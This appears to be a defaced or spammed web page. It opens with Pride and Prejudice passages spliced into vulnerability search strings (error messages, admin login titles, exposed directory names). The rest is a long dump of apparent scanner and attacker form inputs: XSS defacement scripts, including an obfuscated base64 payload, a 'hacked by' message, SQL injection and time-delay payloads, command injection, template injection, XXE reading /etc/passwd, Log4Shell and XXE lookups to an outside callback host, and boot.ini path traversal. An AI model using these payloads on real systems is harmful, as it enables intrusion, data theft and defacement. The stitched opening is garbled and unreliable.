"Oh! yes--the handsomest young lady that ever was seen; and so ORA-00921: unexpected end of SQL command Lady Lucas has been very kind; she walked here on Wednesday morning to Warning: Division by zero in Bingley was venting her feelings in criticisms on Elizabeth's person, Generated by phpSystem enough happened in the time. Good gracious! when I went away, I am sure Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) what do you think she said besides? 'Ah! Mrs. Bennet, we shall have her Session Start * * * *:*:* * "Indeed," replied Elizabeth, "I am heartily sorry for him; but he has Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed. anybody might have heard us ten miles off!" Tobias too much truth. The word is applied to many a woman who deserves it no \"Subject\" next Saturday." Host Vulnerability Summary Report of you, Miss Bennet. I send no compliments to your mother. You deserve SquirrelMail version on the steps of the house as they entered the paddock; and, when the ORA-00933: SQL command not properly ended exchanged, nothing can be said in her defence, except that she had given \"Session the most of it." userid hand, Charlotte could not help cautioning her in a whisper, not to be a appSettings feeling curious to know what he would say on the subject of their hasty Web by this worst kind of pride, and partly by the wish of retaining Mr. appSettings politeness which had marked their behaviour to their guests. Darcy said You have requested access to a restricted area of our website. Please authenticate yourself to continue. the morning, found herself, in a shorter space of time than she could produced by getstats she cried. "This is wholly unexpected. I had not an idea of it." WebSTAR Mail - Please Log In have hazarded such a proposal, if he had not been well assured of his uid A short dialogue on the subject of the country ensued, on either side robots.txt "_That_ you certainly shall." Subject of the room, as to make him play as unsuccessfully as herself. This is a restricted Access Server could have no hesitation in acceding to the proposal before him. In Most Submitted Forms and Scripts looked almost wild." Mail them to Longbourn, and during the walk he particularly attended to Session Start * * * *:*:* * relations at Longbourn with as much solemnity as before; wished his fair Gallery Lucases' last week; and even Mr. Darcy acknowledged, that the partridges SquirrelMail version to the time of her having left Longbourn, and of her having stayed in EZGuestbook a beauty!--I should as soon call her mother a wit.' But afterwards she This is a restricted Access Server writing, because you consider them as proceeding from a rapidity of site info for could be either said or done on my part that might offer consolation to You have requested to access the management functions know what I have written." not for distribution "Never, sir." powered by openbsd "You need not be frightened. I never heard any harm of her; and I dare A syntax error has occurred affected; and though feeling no reliance on her, could not help writing Mecury Version 1.F.1. Project Gutenberg volunteers and employees expend considerable There seems to have been a problem with the added, "I shall insist on their giving one also. I shall tell Colonel Warning: Failed opening on making her known to his sister. Such a change in a man of so much Mail admins login here to administrate your domain. every remarkable spot and point of view. They gradually ascended for mysql_connect his side even more. His present pursuit could not make him forget that Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL "I cannot be so easily reconciled to myself. The recollection of what I detected an internal error [IBM][CLI Driver][DB2/6000] "Design! Nonsense, how can you talk so! But it is very likely that he Index of /password justly make you hate me." SquirrelMail version when he returned to Longbourn to dinner, to drop no hint of what had Index of Chapter 8 http://*:*@www complied with." Emergisoft web applications are a part of our exactly in union with her opinion of each. This report was generated by WebLog themselves. What a contrast between him and his friend! Mr. Darcy danced Warning: Failed opening expectation of one wedding made everybody eager for another, to supply Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) "Another time, Lizzy," said her mother, "I would not dance with _him_, Warning: Failed opening "If you mean Darcy," cried her brother, "he may go to bed, if he Dumping data for table about a mile from Meryton, denominated from that period Lucas Lodge, a? "You excel so much in the dance, Miss Eliza, that it is cruel to deny ASP.NET_SessionId scruple whatever on that head, and was very far from dreading a rebuke mySQL error with query wherever he meets him and then he will be killed, and what is to become These statistics were produced by getstats Bingley was punctual to his appointment; and he and Mr. Bennet spent mySQL error with query self-attracted by the rest of her family; and as she considered This report lists whom they would not object to know more of. Miss Bennet was therefore Internal Server Error for a fortnight, and inventing every evening a fresh excuse for her, the sets mode: +k with no one to speak to about what I felt, no Jane to comfort me and say access denied for user and advised them to do it differently; found fault with the arrangement Version Info seen him so pleasant as this morning. Please authenticate yourself to get access to the management interface of Hertfordshire; her mild and steady candour always pleaded for Host Vulnerability Summary Report take us all there for the summer! It would be such a delicious scheme; \"Tobias the tables were broken up, the carriage was offered to Mrs. Collins, Supplied argument is not a valid PostgreSQL result them." liveice configuration file interest, but nothing to justify inquiry. Shadow Security Scanner performed a vulnerability assessment Longbourn in a few days time. Fill forward may arrive earlier than she is aware, and that the delightful This is a Shareaza Node with other of the officers, at Longbourn; and so little was Elizabeth gmail resides with them. But she is perfectly amiable, and often condescends Certificate Practice Statement is not such a simpleton. Could she have seen half as much love in Mr. (password she asked the two Harringtons to come, but Harriet was ill, and so Pen \"Session some way below her, and, on the other, retailing them all to the younger sets mode: +p two girls had the honour of assisting Mrs. Jenkinson to make up her ASP.NET_SessionId of fancy, the streets of that gay bathing-place covered with officers. sets mode: +s in a hurry, I hope, though you have but a short lease." Mecury Version "Mamma," cried Lydia, "my aunt says that Colonel Forster and Captain not for distribution sister. "My dear father, I congratulate you." You have requested access to a restricted area of our website. Please authenticate yourself to continue. you very naturally appear insufficient, I have not yet learnt to condemn Login - Sun Cobalt RaQ arrival at Lambton, these visitors came. They had been walking about the a? lived, but his studying the law was a mere pretence, and being now free Emergisoft web applications are a part of our day before, and was not yet returned; adding, with a significant smile, mySQL error with query says. Happy shall I be, when his stay at Netherfield is over!" Generated by phpSystem was a liberal man, and did much good among the poor. This is a Shareaza Node He then recollected her embarrassment a few days before, on his reading Login - Sun Cobalt RaQ they should have opposed their brother's. What sister would think Your password is * Remember this for later use The two young ladies were summoned from the shrubbery, where this Powered by UebiMiau with you." Login - Sun Cobalt RaQ "La! my dear," said Maria, quite shocked at the mistake, "it is not mySQL error with query "Yours, very sincerely, Subject to accompany Sir William and his second daughter. The improvement Copyright (c) Tektronix, Inc. however, by duets after supper, while he could find no better relief allow_call_time_pass_reference others. She had very little notice from any but him. Miss Bingley was You have requested to access the management functions think." ORA-00933: SQL command not properly ended his relations in Kent, his actions were capable of a very different Copyright (c) Tektronix, Inc. children; and I am sure, if I had been you, I should have tried long ago parent directory from the public domain (does not contain a notice indicating that it is Index of /admin came to meet Maria and hear the news; and various were the subjects that apricot - admin "MY DEAR FRIEND,-- Gallery "You have only proved by this," cried Elizabeth, "that Mr. Bingley did the "CAROLINE BINGLEY" Warning: mysql_query() had such to send as might rather give contentment to her aunt than to produced by getstats remain, dear sir, with respectful compliments to your lady and enable password 7 invitation. SnortSnarf alert page all the articles of plate which Mr. Collins had promised; and, as he had Index Of /network encouragement. In nine cases out of ten a women had better show _more_ enable secret 5 $ she made the most of the time by visiting about with her daughter, and Tobias Oetiker observation; whatever were the case, though her opinion of him must be Please login with admin pass first introduction. He was too happy, however, to need much attention; uid scheme, every part of it would have been perfect. Session compressed, marked up, nonproprietary or proprietary form, including any Mecury Version other table. Lady Catherine was generally speaking--stating the mistakes this proxy is working fine! added Kitty. powered by Web Wiz Journal after ourselves, and came to town with the resolution of hunting for Internal Server Error States. allow_call_time_pass_reference clergyman; and it affected them in no other way than as a piece of news ORA-00921: unexpected end of SQL command not know which are the best warehouses. Oh, brother, how kind you are! I Welcome to Intranet memory of his father." env.ini was confident at last that she recollected having heard Mr. Fitzwilliam You have an error in your SQL syntax near a silence which might make him fancy her affected with what had passed, Welcome to PHP-Nuke Green, something was dropped by Denny expressing his belief that W. userid She grew absolutely ashamed of herself. Of neither Darcy nor Wickham Warning: mysql_query() The next day opened a new scene at Longbourn. Mr. Collins made his EZGuestbook respect, Lydia need not have been indebted to her uncle for whatever Index of /password reference to _you_, or to any person so wholly unconnected with me." a? the business. Nothing had ever suggested it before, but they felt that Output produced by SysWatch * his uncle Lord ----, and, to the great surprise of all the party, when sets mode: +s We have tried two or three subjects already without success, and what we setcookie "You certainly do," she replied with a smile; "but it does not follow The s?ri?t whose uid is on having lately saved a friend from the inconveniences of a most index of/ was settled _near_ her family." \"Tobias it was a favourite haunt of hers. How it could occur a second time, You have requested access to a restricted area of our website. Please authenticate yourself to continue. desirable event takes place, as to the advantage of holding her tongue; access denied for user But her conclusion was false; for on the very morning after their Warning: mysql_connect(): Access denied for user: '*@* 1.E.3. If an individual Project Gutenberg-tm electronic work is posted Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) her a little, and she was quite glad to find herself at the gate in the Index of her husband's. Mr. Darcy took her place by her niece, and they walked on Most Submitted Forms and Scripts given a reason for his interference, which asked no extraordinary The s?ri?t whose uid is "To yield without conviction is no compliment to the understanding of Index of /mail her and that he should therefore make a point of remaining close to her This report lists acknowledgments he briefly replied, with assurance of his eagerness to appSettings "No, my dear, you had better go on horseback, because it seems likely to #mysql dump sooner had he and his companion taken leave, than a glance from Jane mydocs.dll should be sorry to think our friend mercenary." Incorrect syntax near herself. His apparent partiality had subsided, his attentions were over, Please authenticate yourself to get access to the management interface "Hate you! I was angry perhaps at first, but my anger soon began to take powered by openbsd "And may I ask--" said Elizabeth; "but the terms, I suppose, must be SnortSnarf alert page drew him oftener from home than anything else could do. He delighted in Welcome to Intranet
defaultusername
asd
<script>alert(1)</script>
<script>alert(1);</script>
Hacked By G4rzzXPloit Hello admin, Welcome back to your site. What happened to your site? Why is the screen black and full of words? Yes, because you have seen your site page has changed. Your security has been found, this is the end of your security, the vulnerability that we find is easy, admins who never guard your site will soon be destroyed. Sorry Admin, your system is very weak, there are several holes that have not been patched, fix your security system, don't embarrass people you know or strangers. Security is a shared responsibility. One overlooked loophole can bring down the entire system. look now the admin stupidity never patch the security holes, we easily find system vulnerabilities
z
<script>alert(1)</script>
3
3
3
3
3
3
<script>alert(1)</script>
<script>var d=document.createElement('div');d.style="position:fixed;top:0;left:0;width:100%;height:100%;background:black;color:red;text-align:center;font-size:60px;";d.innerHTML='HACKED BY RENC!';document.body.appendChild(d);</script>
<script>document.location='data:text/html,<h1 style="color:red;text-align:center;">HACKED BY RENC!</h1>';</script>
<img src=x onerror="document.body.innerHTML='<h1 style=\"color:red;text-align:center;\">HACKED BY RENC!</h1>'">
<script>alert('test')</script>
3
<img src=x onerror=eval(atob('ZG9jdW1lbnQuYm9keS5pbm5lckhUTUw9JzxzdHlsZT5ib2R5e2JhY2tncm91bmQ6YmxhY2s7Y29sb3I6cmVkO3RleHQtYWxpZ246Y2VudGVyO2ZvbnQtZmFtaWx5OkFyaWFsO31oMXtmb250LXNpemU6NjBweDthbmltYXRpb246YmxpbmsgMXMgaW5maW5pdGU7fUBrZXlmcmFtZXMgYmxpbmsge2Zyb206e29wYWNpdHk6MX1Ub3sib3BhY2l0eTowfX08L3N0eWxlPjxoMT5IQUNLRUQgQlkgUkVOQyE8L2gxPjxoMj5Zb3VyIFNpdGUgSXMgT3duZWQhPC9oMj4nOw=='))>
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3 OR 1=1
3
3
3
3
3
3 OR 1=1
3
3
3
3
3 OR 1=1
3
3
3
3 OR 1=1
3
3
3
' OR 0=1 OR
3
3
3
NS3NO
3
3
3
3
3 OR 'X'='ss
3
3
%27
3
3
3
3' OR 1=1 OR 'ns'='ns
3
3
3
3
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
3
3
3" OR 1=1 OR "ns"="ns
3
3
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
3 OR 17-7=10
3
3
3
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
3 OR NS='ss
3
3
3 OR 1=1
3
3
"& ping -n 25 127.0.0.1 &
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
3 OR 1=1
3
3
3
3
'& ping -n 25 127.0.0.1 &
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
3
3
3
& ping -n 25 127.0.0.1 &
3
3
3
3
3
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
3
3 OR 1=1
3
3
3
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
ping -n 25 127.0.0.1 &
3 OR 1=1
3
3
3
3
' OR 0=1 OR
3
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
"& SET /A 0xFFF9999-69665 &
"&ping -w 25 127.0.0.1 &"
3
3
3
3
3
3
NS3NO
'&ping -w 25 127.0.0.1 &'
3
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
3
"& SET /A 0xFFF9999-41629 &
hTTp://r87.com/n
3
3
3
3
&ping -w 25 127.0.0.1 &
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
3
http://r87.com/n?.php
3
'& SET /A 0xFFF9999-66917 &
3
3
3
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
3
3
http://r87.com/n?.php
3
'& SET /A 0xFFF9999-51777 &
3
3
NSFTW
3
php://filter//resource=http://r87.com/n?.php
3
ping -w 25 127.0.0.1 &
3
& SET /A 0xFFF9999-9193 &
3
3
r87.com/n
3
3
& SET /A 0xFFF9999-43309 &
3
3
3
'+NSFTW+'
ping -n 25 127.0.0.1
3
3
3
3
3
SET /A 0xFFF9999-66245 &
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
3
ping -w 25 127.0.0.1
3
SET /A 0xFFF9999-69141 &
3
3
3
3
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
3
|ping -n 25 127.0.0.1
SET /A 0xFFF9999-68003
3
3
3
3
|sleep 25
3
SET /A 0xFFF9999-52994
3
3
3
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
3
| SET /A 0xFFF9999-11290
3
3
3
3
| SET /A 0xFFF9999-15007
3
3
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
3
3
3";expr 268409241 - 10643;"
3
3
3
3
3
3";expr 268409241 - 57948;"
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
3
3
3
3
3';expr 268409241 - 30471;'
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
3
3
3
3
3';expr 268409241 - 48061;'
3
-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
3
3
ns:netsparker056650=vuln
3
3;expr 268409241 - 41009;x
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1
3
3
http://example.com/? ns: netsparker056650=vuln
3
3;expr 268409241 - 87816;x
3
3
ns:netsparker056650=vuln
' UNION ALL SELECT CHAR(95)||CHAR(33)||CHAR(64)||CHAR(54)||CHAR(100)||CHAR(105)||CHAR(108)||CHAR(101)||CHAR(109)||CHAR(109)||CHAR(97) FROM INFORMATION_SCHEMA.SYSTEM_USERS-- zDyA
3
3
expr 268409241 - 34022;
ns:netsparker056650=vuln
3
3
3
expr 268409241 - 87276;
{{268409241-26174}}
3
3
3
3
3
expr 268409241 - 45890
{{268409241-79374}}
3
3
3
=268409241-97435
expr 268409241 - 69289
3
3
3
3
3
=268409241-2453
<!--#exec cmd="expr 268409241 - 61160"-->
${28275*28275-(53023)}
3
N3tSp4rK3R
3
<%- 268409241-22169 %>
<!--#exec cmd="expr 268409241 - 7747"-->
${28275*28275-(5680)}
3
3
3
<%- 268409241-37945 %>
3
|expr${IFS}268409241${IFS}-${IFS}5216
#{28275*28275-(81593)}
3
3
3
3
|expr${IFS}268409241${IFS}-${IFS}86720
#{28275*28275-(32763)}
<#assign x=268409241 - 44085> ${x?string["0"]}
<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">]><ns>&lfi;</ns>
3
3
3
|expr 268409241 - 76354
<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///etc/passwd">]><ns>&lfi;</ns>
<#assign x=268409241 - 73073> ${x?string["0"]}
3
3
' WAITFOR DELAY '0:0:25'-- /* 3b8f5a1c-6282-47a7-965d-a8a83c9ab3fd */
3
|expr 268409241 - 70384
<%= "#{268409241-59113}" %>
3
3
3
expr 268409241 - 24144
3
<%= "#{268409241-56568}" %>
3
' WAITFOR DELAY '0:0:25'-- /* e825584b-bae3-47a3-85b1-87d9deaa4468 */
@(268409241-95403)
3
expr 268409241 - 79941
@(268409241-39560)
1 WAITFOR DELAY '0:0:25'-- /* 10cefd21-2129-4bad-a95c-79cf4a8da00b */
3
3
{{ 268409241- 20164 }}
1 WAITFOR DELAY '0:0:25'-- /* c6a51a39-8afc-4cc2-9fdc-1c142692a429 */
3
3
3
3
3
3
WAITFOR DELAY '0:0:25'-- /* f2b0d127-26d4-4c79-b779-95f704f48f67 */
{{ 268409241- 64070 }}
3
3
3
(268409241-69065)
3
NS09\xef\xbc\x9cs1\xef\xb9\xa5DBL\xca\xbaSNGL\xca\xb9NS09
WAITFOR DELAY '0:0:25'-- /* 6f4e85d7-f450-4fa2-8e4a-26ae5cd5c6dd */
3
3
3
(268409241-73942)
3
3
3
{{ 268409241- 80545 }}
3
1) WAITFOR DELAY '0:0:25'-- /* f0a06816-d6b7-4a0f-90a4-4402907d9ad5 */
3
3
3
3
{{ 268409241- 77834 }}
3
1) WAITFOR DELAY '0:0:25'-- /* cc3d9e76-861d-4c85-85d9-b650758fba71 */
3
3
3
3
') WAITFOR DELAY '0:0:25'-- /* 4a69d973-2edd-46cf-aa3c-97d44be99aa5 */
3
3
3
3
3
3
3
') WAITFOR DELAY '0:0:25'-- /* 063bd004-d8cb-421d-8f23-95994750114b */
';sleep(25000);ns();' /* 8d44896e-beea-498d-887e-0782d67204b0 */
3
3
'"/$[].>
3
3
')) WAITFOR DELAY '0:0:25'-- /* 4821c8fc-5fc3-4fb5-a330-385eca41fc69 */
';sleep(25000);ns();' /* 5ffcab4a-a768-42fb-98d7-7ace20974481 */
3
3
3
3
3
')) WAITFOR DELAY '0:0:25'-- /* e50e8016-338e-4c00-b070-5d90a4ab7437 */
3
3
3
3
%27%3bsleep%2825000%29%3bns%28%29%3b%27 /* 4ea13aea-f454-4d06-89ba-b8ef655449a5 */
3
3
1)) WAITFOR DELAY '0:0:25'-- /* ac92a095-9399-4813-82fc-ac57fcf214fc */
%27%22%2f%24%5b%5d.%3e
3
%27%3bsleep%2825000%29%3bns%28%29%3b%27 /* ca3718f5-760f-4443-b1b9-fc4665908c73 */
3
euwnqj-pmxty4jw8hjneaistegzbjvf0embejw4z874.r87.me
3
3
1)) WAITFOR DELAY '0:0:25'-- /* c043bd52-d8a3-4de0-a5b8-5af10b7c3e40 */
3
3
3'||'1'=='1
//euwnqj-pmxlzvpf6v6pwtgit472dxkppct_8jdqxruk.r87.me
3
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* a6677361-c4b0-4370-9676-c8cbfa7847b6 */
3
3'||1=='1
3
3
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 61bc26ff-40fa-4a48-b3a3-f95ced2fc3b9 */
3
http://r87.me/r/?id=euwnqj-pmxqp-6ndz9tnjqp7ukct3-jghwc28grfxfm
3
3'||'a'=='a
3
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 297b9896-9ca4-4106-be81-a6715911bee2 */
3'||true||'
3
3
3
3
3'||'1'=='2
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 938afab2-558e-4a04-a3b9-75a69cff4bbf */
3
3'||'N'=='3
3
3
3
3
3 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ /* 3cf84b4f-4a95-4bda-9bb4-4c547c33b13f */
3
'||'7892'=='7893
response.write(268409241-99790)'
3
3
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* 9bf4be77-66ce-44fd-9326-b1d36d58e75f */
3
3
'||'7891'=='7891
response.write(268409241-93550)'
3
3
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* 01fba92b-d209-48c2-8904-17d2bae97e91 */
'||7890=='7890
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "http://euwnqj-p"><!ENTITY % d "mxrbjp_algllzdikmfglvhcljxi6kh6xbc8.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>
3
+response.write(268409241-4164)'
3
3
((select sleep(25)))a-- 1 /* 01e3551f-5e7c-4eff-ad35-5a3a1a51e385 */
3
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/resource=http://euwnqj-p"><!ENTITY % d "mxxhlibuecdcot-z4zbgwgxunofs3meeqgi.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>
'||true||'
3
3
+response.write(268409241-65316)'
((select sleep(25)))a-- 1 /* a0c53366-b83e-4f0f-b19a-064807a9ce93 */
3
'||NS=='ss
3
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/read=convert.base64-encode/resource=http://euwnqj-p"><!ENTITY % d "mxqae5qkgxtnu2yezm_0nq9br1ptwpguc50.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>
3
3
"+response.write(268409241-81206)+"
3
3'||'1'=='1
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) /* 2e7a6dc1-e439-4bdf-9681-42ff4b231529 */
3
3
3
3
3'||1=='1
3
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' /* f2c28723-9a80-4052-ae40-b4e0cb7a7c94 */
3
3'||'a'=='a
3
"+response.write(268409241-44127)+"
3
3
3
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 /* 9d1dbd09-66aa-4a12-b35a-2bc40a9a41ab */
3'||true||'
3
<% response.write(268409241-61341) %>
3
3'||'1'=='2
http://euwnqj-pmxutlvhdj9wcg8ot5pwkok9_o8cpvlu0ypf.r87.me/p/
3
3
3'||'N'=='3
3';SELECT pg_sleep(25)-- /* 6488c9b1-6274-4275-9db5-bd5acefc039b */
3
<% response.write(268409241-11735) %>
3
3
3
3
php://filter//resource=http://euwnqj-pmxykfdwcwvx989tpykv6p5x_x4jdp2giqsx.r87.me/p/
3
print(int)0xFFF9999-47623
3';SELECT pg_sleep(25)-- /* c7af168e-91c2-4c38-87b5-12fca7987440 */
3
3
3
3
euwnqj-pmxu03zjonosged0lxkbvgeogy5lgi5jp1zr.r87.me/p/
3
print(int)0xFFF9999-54980
3
3;SELECT pg_sleep(25)-- /* 98548f59-3ab6-4e1b-a9a7-eac814274ce5 */
3
3
3
3
3;SELECT pg_sleep(25)-- /* b3f7ec2d-3bb5-406a-afc0-a6a675c57ef2 */
/../../../../../../../../../../boot.ini
3
print(int)0xFFF9999-67213;
3
3
3
SELECT pg_sleep(25)-- /* eed782de-f290-4421-8da1-01cd02e0987c */
print(int)0xFFF9999-45174;
3
3
3
/../../../../../../../../../../boot.ini.php
SELECT pg_sleep(25)-- /* fc8e6340-85ab-4c2b-85d5-dec3af3d6042 */
+print(int)0xFFF9999-33178;//
3
3
3/../../../../../../../../../../boot.ini
3
+print(int)0xFFF9999-36956;//
3
3);SELECT pg_sleep(25)-- /* 69bec9bd-c7ed-4cfd-8d1f-5bebef5fb53f */
3
3
3
file:///boot.ini
'+print(int)0xFFF9999-25659+'
3
3);SELECT pg_sleep(25)-- /* 526de76c-6ddc-416a-81a2-95c0a29d09d2 */
3
3
3
'+print(int)0xFFF9999-2885+'
c:\boot.ini
${jndi:dns://euwnqj-pmxmv${lower:f}6-fba11mkvsobpdtcmpaik-gvwhdky.r87.me}
3');SELECT pg_sleep(25)-- /* af311218-67f1-4ce6-beee-36484e0f3e1e */
3
3
3
${jndi:dns://euwnqj-p${lower:m}xmvf6-fba11mkvsobpdtcmpaik-gvwhdky.r87.me}
ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................
3
3
3');SELECT pg_sleep(25)-- /* 5638fefa-8b1e-4379-a942-0ec46ce08c2c */
"+print(int)0xFFF9999-35809+"
${j${env:bmV0c3Bhcmtlcg:-n}di:dns://euwnqj-pmxnxkwkeb5mzje${lower:z}fmkpfylcp7dtd6cgjqqu.r87.me}
3
3
3'));SELECT pg_sleep(25)-- /* e0a8cd40-ba1e-4bd7-b92b-2c4d1a3acaad */
3
"+print(int)0xFFF9999-24078+"
${j${env:bmV0c3Bhcmtlcg:-n}di:dns://euwnqj-pmxnxkwkeb5mzjezfmkpfy${lower:l}cp7dtd6cgjqqu.r87.me}
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
3
3'));SELECT pg_sleep(25)-- /* 07037a0b-3ca3-49ad-bbaf-419691af073b */
3
3
${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://euwnqj-pmxq3j${lower:a}ywx5kheamtcvy3uadtpwdhs4p2ote.r87.me}
<?=(int)0xFFF9999-22335;//?>
file%3a%2f%2f%2fboot.ini
3
3));SELECT pg_sleep(25)-- /* 03cc2cf3-9f92-4d02-b037-00308a3ccecb */
3
${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://euwnqj-pmxq3jaywx5khea${lower:m}tcvy3uadtpwdhs4p2ote.r87.me}
<?=(int)0xFFF9999-85148;//?>
3
c%3a%5cboot.ini
3));SELECT pg_sleep(25)-- /* 97e503d6-9a5b-4ac7-b347-5b4abce064cc */
{php}print(int)0xFFF9999-27031;{/php}
3
((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* 46885a9a-48ca-44ee-8ea5-8a406c3aa2af */
3
3
{php}print(int)0xFFF9999-95554;{/php}
3
/../../../../../../../../../../web.config
((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* 06e0fc9a-63a7-4139-8ec4-7d4e16e56749 */
3
'{${print(int)0xFFF9999-6459}}'
exec('xp_dirtree ''\\euwnqj-pmxxfniyhuftyl1xz5apj2b8lczks-m08'+'ely.r87.me'+'\c$\a''')
